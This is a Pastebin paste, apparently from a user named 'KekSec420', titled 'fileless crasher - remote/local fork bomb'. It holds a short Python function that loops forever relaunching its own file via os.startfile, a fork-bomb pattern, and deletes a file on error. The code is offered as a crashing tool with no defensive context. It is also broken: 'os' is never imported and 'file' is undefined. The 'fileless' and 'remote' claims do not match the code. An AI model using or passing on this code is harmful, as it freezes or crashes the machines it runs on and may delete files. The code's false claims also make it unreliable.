KekSec420

fileless crasher - remote/local fork bomb

May 15th, 2025
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.17 KB | None | 0 0
  1. # File remote crasher - a fileless fork bomb
  2. def new_crasher():
  3. while 1:
  4. try:
  5. os.startfile(__file__)
  6. except:
  7. os.remove(file)
Advertisement
Add Comment
Please, Sign In to add comment